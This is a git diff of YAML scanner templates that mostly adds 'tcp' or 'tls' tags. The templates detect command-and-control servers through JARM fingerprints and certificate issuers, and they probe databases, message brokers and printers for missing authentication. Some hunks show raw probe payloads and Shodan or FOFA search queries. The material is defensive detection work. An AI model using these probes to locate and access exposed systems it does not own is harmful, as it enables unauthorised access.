a/network/jarm/c2/covenant-c2-jarm.yaml +++ b/network/jarm/c2/covenant-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://twitter.com/MichalKoczwara/status/1548685058403360770 metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,covenant + tags: jarm,network,c2,ir,osint,cti,covenant,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/deimos-c2-jarm.yaml b/network/jarm/c2/deimos-c2-jarm.yaml index 098e0d79a8..bf1ee183f0 100644 --- a/network/jarm/c2/deimos-c2-jarm.yaml +++ b/network/jarm/c2/deimos-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://twitter.com/MichalKoczwara/status/1551632627387473920 metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,deimos,network + tags: jarm,c2,ir,osint,cti,deimos,network,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/evilginx2-jarm.yaml b/network/jarm/c2/evilginx2-jarm.yaml index eb3ca54cd4..85efbd2517 100644 --- a/network/jarm/c2/evilginx2-jarm.yaml +++ b/network/jarm/c2/evilginx2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/kgretzky/evilginx2 metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,evilginx2,phishing + tags: jarm,network,c2,ir,osint,cti,evilginx2,phishing,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/generic-c2-jarm.yaml b/network/jarm/c2/generic-c2-jarm.yaml index ba02a7897e..c51265b260 100644 --- a/network/jarm/c2/generic-c2-jarm.yaml +++ b/network/jarm/c2/generic-c2-jarm.yaml @@ -10,7 +10,7 @@ info: - https://github.com/MichaelKoczwara/C2JARM metadata: max-request: 1 - tags: network,jarm,c2,ir,osint,cti + tags: network,jarm,c2,ir,osint,cti,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/grat2-c2-jarm.yaml b/network/jarm/c2/grat2-c2-jarm.yaml index 02ea45e886..b2e4162165 100644 --- a/network/jarm/c2/grat2-c2-jarm.yaml +++ b/network/jarm/c2/grat2-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/r3nhat/GRAT2 metadata: max-request: 1 - tags: c2,jarm,network,ir,osint,cti,shad0w + tags: c2,jarm,network,ir,osint,cti,shad0w,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/havoc-c2-jarm.yaml b/network/jarm/c2/havoc-c2-jarm.yaml index 7ccd6850f7..f4fb946ebd 100644 --- a/network/jarm/c2/havoc-c2-jarm.yaml +++ b/network/jarm/c2/havoc-c2-jarm.yaml @@ -13,7 +13,7 @@ info: verified: "true" max-request: 1 shodan-query: 'ssl:postalCode=3540 ssl.jarm:3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e' - tags: jarm,c2,ir,osint,cti,havoc,network + tags: jarm,c2,ir,osint,cti,havoc,network,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/mac-c2-jarm.yaml b/network/jarm/c2/mac-c2-jarm.yaml index e10e035f49..3c10258199 100644 --- a/network/jarm/c2/mac-c2-jarm.yaml +++ b/network/jarm/c2/mac-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/cedowens/MacC2 metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,macc2 + tags: jarm,network,c2,ir,osint,cti,macc2,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/macshell-c2-jarm.yaml b/network/jarm/c2/macshell-c2-jarm.yaml index 78e2e3e956..3efd1cfe00 100644 --- a/network/jarm/c2/macshell-c2-jarm.yaml +++ b/network/jarm/c2/macshell-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/cedowens/MacShellSwift metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,macshell + tags: jarm,network,c2,ir,osint,cti,macshell,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/merlin-c2-jarm.yaml b/network/jarm/c2/merlin-c2-jarm.yaml index b43ccbf94c..efb2195b4d 100644 --- a/network/jarm/c2/merlin-c2-jarm.yaml +++ b/network/jarm/c2/merlin-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://merlin-c2.readthedocs.io/en/latest/ metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,merlin + tags: jarm,network,c2,ir,osint,cti,merlin,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/metasploit-c2-jarm.yaml b/network/jarm/c2/metasploit-c2-jarm.yaml index fb8f6e89e8..72cae7ea12 100644 --- a/network/jarm/c2/metasploit-c2-jarm.yaml +++ b/network/jarm/c2/metasploit-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,metasploit + tags: jarm,network,c2,ir,osint,cti,metasploit,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/mythic-c2-jarm.yaml b/network/jarm/c2/mythic-c2-jarm.yaml index e6464bdb08..c61844df73 100644 --- a/network/jarm/c2/mythic-c2-jarm.yaml +++ b/network/jarm/c2/mythic-c2-jarm.yaml @@ -12,7 +12,7 @@ info: - https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,mythic + tags: jarm,network,c2,ir,osint,cti,mythic,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/posh-c2-jarm.yaml b/network/jarm/c2/posh-c2-jarm.yaml index a74933c0dc..4a3a74dfc5 100644 --- a/network/jarm/c2/posh-c2-jarm.yaml +++ b/network/jarm/c2/posh-c2-jarm.yaml @@ -12,7 +12,7 @@ info: - https://poshc2.readthedocs.io/en/latest/ metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,posh + tags: jarm,network,c2,ir,osint,cti,posh,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/shad0w-c2-jarm.yaml b/network/jarm/c2/shad0w-c2-jarm.yaml index 6092db22be..057615fa2d 100644 --- a/network/jarm/c2/shad0w-c2-jarm.yaml +++ b/network/jarm/c2/shad0w-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/bats3c/shad0w metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,shad0w + tags: jarm,network,c2,ir,osint,cti,shad0w,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/silenttrinity-c2-jarm.yaml b/network/jarm/c2/silenttrinity-c2-jarm.yaml index 3bebaa2553..351a64b2eb 100644 --- a/network/jarm/c2/silenttrinity-c2-jarm.yaml +++ b/network/jarm/c2/silenttrinity-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/byt3bl33d3r/SILENTTRINITY metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,silenttrinity + tags: jarm,network,c2,ir,osint,cti,silenttrinity,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/sliver-c2-jarm.yaml b/network/jarm/c2/sliver-c2-jarm.yaml index 968fb52b92..793cd172e9 100644 --- a/network/jarm/c2/sliver-c2-jarm.yaml +++ b/network/jarm/c2/sliver-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/BishopFox/sliver metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,sliver + tags: jarm,network,c2,ir,osint,cti,sliver,tcp tcp: - inputs: - data: 2E diff --git a/network/misconfig/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml index bd5e4743d4..2060d0eedd 100644 --- a/network/misconfig/apache-dubbo-unauth.yaml +++ b/network/misconfig/apache-dubbo-unauth.yaml @@ -9,11 +9,10 @@ info: reference: - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/ metadata: - fofa-query: apache dubbo - max-request: 1 verified: true - tags: network,dubbo,apache,unauth,misconfig - + max-request: 1 + fofa-query: apache dubbo + tags: network,dubbo,apache,unauth,misconfig,tcp tcp: - inputs: - data: "68656c700d0a" diff --git a/network/misconfig/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml index 548ceb290d..d091f52aa5 100644 --- a/network/misconfig/apache-rocketmq-broker-unauth.yaml +++ b/network/misconfig/apache-rocketmq-broker-unauth.yaml @@ -9,12 +9,11 @@ info: reference: - https://rocketmq.apache.org/docs/bestPractice/03access metadata: - fofa-query: protocol="rocketmq" + verified: true max-request: 1 shodan-query: title:"RocketMQ" - verified: true - tags: network,rocketmq,broker,apache,unauth,misconfig - + fofa-query: protocol="rocketmq" + tags: network,rocketmq,broker,apache,unauth,misconfig,tcp tcp: - inputs: - data: "000000c9000000b17b22636f6465223a32352c226578744669656c6473223a7b224163636573734b6579223a22726f636b65746d7132222c225369676e6174757265223a222b7a6452645575617a6953516b4855557164727477673146386a6b3d227d2c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3433337d746573745f6b65793d746573745f76616c75650a0a" diff --git a/network/misconfig/clamav-unauth.yaml b/network/misconfig/clamav-unauth.yaml index cd31e75d47..a2d91dc856 100644 --- a/network/misconfig/clamav-unauth.yaml +++ b/network/misconfig/clamav-unauth.yaml @@ -12,11 +12,10 @@ info: - https://seclists.org/nmap-dev/2016/q2/201 - https://bugzilla.clamav.net/show_bug.cgi?id=11585 metadata: + verified: true max-request: 1 shodan-query: port:3310 product:"ClamAV" version:"0.99.2" - verified: true - tags: network,clamav,unauth,seclists,misconfig - + tags: network,clamav,unauth,seclists,misconfig,tcp tcp: - inputs: - data: "SCAN /nonexistent/{{to_lower(rand_text_alpha(10))}}\r\n" diff --git a/network/misconfig/clickhouse-unauth.yaml b/network/misconfig/clickhouse-unauth.yaml index e8460a0350..bfb44326ff 100644 --- a/network/misconfig/clickhouse-unauth.yaml +++ b/network/misconfig/clickhouse-unauth.yaml @@ -7,7 +7,7 @@ info: description: ClickHouse was able to be accessed with no required authentication in place. metadata: max-request: 1 - tags: network,clickhouse,unauth,misconfig + tags: network,clickhouse,unauth,misconfig,tcp tcp: - inputs: diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index 3e37bd1c95..7afe5dd6ae 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -11,11 +11,10 @@ info: - https://book.hacktricks.xyz/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd metadata: + verified: true max-request: 1 shodan-query: product:"Erlang Port Mapper Daemon" - verified: true - tags: demon,enum,erlang,epmd - + tags: demon,enum,erlang,epmd,network,misconfig,tcp tcp: - inputs: - data: "\x00\x01\x6e" diff --git a/network/misconfig/ganglia-xml-grid-monitor.yaml b/network/misconfig/ganglia-xml-grid-monitor.yaml index 3de2b4a71b..1f1bed29fb 100644 --- a/network/misconfig/ganglia-xml-grid-monitor.yaml +++ b/network/misconfig/ganglia-xml-grid-monitor.yaml @@ -9,7 +9,7 @@ info: - http://ganglia.info/ metadata: max-request: 1 - tags: ganglia,network,misconfig + tags: ganglia,network,misconfig,tcp tcp: - inputs: diff --git a/network/misconfig/memcached-stats.yaml b/network/misconfig/memcached-stats.yaml index 8af382ab72..d1ca4417ea 100644 --- a/network/misconfig/memcached-stats.yaml +++ b/network/misconfig/memcached-stats.yaml @@ -8,7 +8,7 @@ info: Memcached stats is used to return server statistics such as PID, version, connections, etc. metadata: max-request: 1 - tags: network,memcached,misconfig + tags: network,memcached,misconfig,tcp tcp: - inputs: diff --git a/network/misconfig/mongodb-unauth.yaml b/network/misconfig/mongodb-unauth.yaml index c7190ea2e5..3302246c0d 100644 --- a/network/misconfig/mongodb-unauth.yaml +++ b/network/misconfig/mongodb-unauth.yaml @@ -5,15 +5,14 @@ info: author: pdteam severity: high description: MongoDB was able to be accessed with no password. Note that MongoDB does not require a password by default. + remediation: Enable Authentication in MongoDB reference: - https://github.com/orleven/Tentacle - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb - https://www.mongodb.com/features/mongodb-authentication - remediation: Enable Authentication in MongoDB metadata: max-request: 1 - tags: network,mongodb,unauth,misconfig - + tags: network,mongodb,unauth,misconfig,tcp tcp: - inputs: - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml index 26f6f1cde1..76e4e6054c 100644 --- a/network/misconfig/mysql-native-password.yaml +++ b/network/misconfig/mysql-native-password.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,mysql,db,misconfig + tags: network,mysql,db,misconfig,tcp tcp: - host: diff --git a/network/misconfig/printers-info-leak.yaml b/network/misconfig/printers-info-leak.yaml index 6c01ac8f63..4c3bd0ff5e 100644 --- a/network/misconfig/printers-info-leak.yaml +++ b/network/misconfig/printers-info-leak.yaml @@ -4,14 +4,13 @@ info: name: Unauthorized Printer Access author: pussycat0x severity: info - reference: - - https://book.hacktricks.xyz/pentesting/9100-pjl description: | Unauthorized access to printers allows attackers to print, eavesdrop sensitive documents. + reference: + - https://book.hacktricks.xyz/pentesting/9100-pjl metadata: max-request: 1 - tags: network,iot,printer,misconfig - + tags: network,iot,printer,misconfig,tcp tcp: - inputs: - data: "@PJL INFO STATUS\n" diff --git a/network/misconfig/sap-router-info-leak.yaml b/network/misconfig/sap-router-info-leak.yaml index 928e9f2f2b..aa0f0811c2 100644 --- a/network/misconfig/sap-router-info-leak.yaml +++ b/network/misconfig/sap-router-info-leak.yaml @@ -10,7 +10,7 @@ info: - https://support.sap.com/en/tools/connectivity-tools/saprouter.html metadata: max-request: 1 - tags: network,sap,misconfig,saprouter + tags: network,sap,misconfig,saprouter,tcp tcp: - inputs: diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml index 936051dc1a..e0cef548ae 100644 --- a/network/misconfig/tidb-native-password.yaml +++ b/network/misconfig/tidb-native-password.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,tidb,db,misconfig + tags: network,tidb,db,misconfig,tcp tcp: - host: diff --git a/network/misconfig/tidb-unauth.yaml b/network/misconfig/tidb-unauth.yaml index 3d95d6f47b..e99232ea3d 100644 --- a/network/misconfig/tidb-unauth.yaml +++ b/network/misconfig/tidb-unauth.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 zoomeye-query: tidb +port:"4000" - tags: network,tidb,unauth,misconfig + tags: network,tidb,unauth,misconfig,tcp tcp: - inputs: diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index 90cad1b4ce..6a5f22bdd5 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -9,11 +9,10 @@ info: reference: - https://www.postgresql.org/docs/9.6/auth-methods.html metadata: + verified: "true" max-request: 1 shodan-query: port:5432 product:"PostgreSQL" - verified: "true" - tags: network,postgresql,db,unauth,misconfig - + tags: network,postgresql,db,unauth,misconfig,tcp tcp: - inputs: - data: "00000054000300007573657200706f73746772657300646174616261736500706f737467726573006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000" # default database postgres diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml index b6028aa305..52c1a5d0dd 100644 --- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml +++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: clockwatch,rce,network + tags: clockwatch,rce,network,tcp tcp: - inputs: diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index de606fe734..8cee4b3d29 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -18,7 +18,7 @@ info: - https://github.com/zenml-io/zenml/compare/0.44.3...0.44.4 classification: epss-score: 0.00045 - epss-percentile: 0.13559 + epss-percentile: 0.15096 metadata: verified: true max-request: 1 diff --git a/ssl/c2/sliver-c2.yaml b/ssl/c2/sliver-c2.yaml index a08fdb62c0..0dd5918ac1 100644 --- a/ssl/c2/sliver-c2.yaml +++ b/ssl/c2/sliver-c2.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 shodan-query: product:"Sliver C2" - tags: c2,ssl,ir,osint,malware,sliver + tags: c2,ssl,ir,osint,malware,sliver,tls ssl: - address: "{{Host}}:{{Port}}" matchers-condition: and diff --git a/ssl/c2/venomrat.yaml b/ssl/c2/venomrat.yaml index 49c343dc7a..abee5b20d7 100644 --- a/ssl/c2/venomrat.yaml +++ b/ssl/c2/venomrat.yaml @@ -10,7 +10,7 @@ info: verified: "true" max-request: 1 fofa-query: cert.issuer.cn="VenomRAT Server" - tags: c2,ir,osint,malware,ssl,venomrat + tags: c2,ir,osint,malware,ssl,venomrat,tls ssl: - address: "{{Host}}:{{Port}}" diff --git a/ssl/deprecated-tls.yaml b/ssl/deprecated-tls.yaml index f4eb823cf7..debbb2e17e 100644 --- a/ssl/deprecated-tls.yaml +++ b/ssl/deprecated-tls.yaml @@ -4,17 +4,16 @@ info: name: Deprecated TLS Detection author: righettod,forgedhallpass severity: info - reference: - - https://ssl-config.mozilla.org/#config=intermediate description: | Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. remediation: | Update the web server's TLS configuration to disable TLS 1.1 and SSLv3. + reference: + - https://ssl-config.mozilla.org/#config=intermediate metadata: max-request: 3 shodan-query: ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1 tags: ssl,tls - ssl: - address: "{{Host}}:{{Port}}" min_version: tls11